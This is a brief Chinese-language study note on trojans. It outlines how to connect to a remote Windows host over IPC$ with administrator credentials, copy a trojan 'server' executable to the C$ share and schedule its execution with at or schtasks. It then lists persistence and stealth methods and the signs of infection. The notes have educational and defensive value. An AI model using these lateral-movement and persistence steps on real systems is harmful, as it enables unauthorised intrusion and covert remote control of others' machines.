与ip建立连接
- 命令
net use \\ip\ipc$ password /user:administratornet use 是建立远程连接的命令
ipc$是一种协议
\\ 是远程协议
dir查看当前路径
cd 路径进入(路径)
copy 文件 \\ip\路径$ //c$ 就是c盘复制文件
通过cmd添加任务执行服务端
net time \\ip查看对方系统时间
at \\ip\c$\服务端.exe添加执行任务
at命令以弃用,改用schtasks.exe
木马的启动方式
自启动功能
——添加到启动项
——修改组策略
——修改注册表
——捆绑
隐蔽性
——木马本身的隐蔽性
——运行时的隐蔽性
——通信时的隐蔽性
中了木马的征兆
中了木马的征兆
——计算机反应速度慢
——硬盘不停的读写
——鼠标键盘不听使唤
——窗口突然被关闭
——新的窗口莫名其妙地打开
——网络传输指示灯一直在闪烁
——系统资源占用很多
——运行某个程序没有反应
——关闭某个程序时防火墙探测到有邮件发出
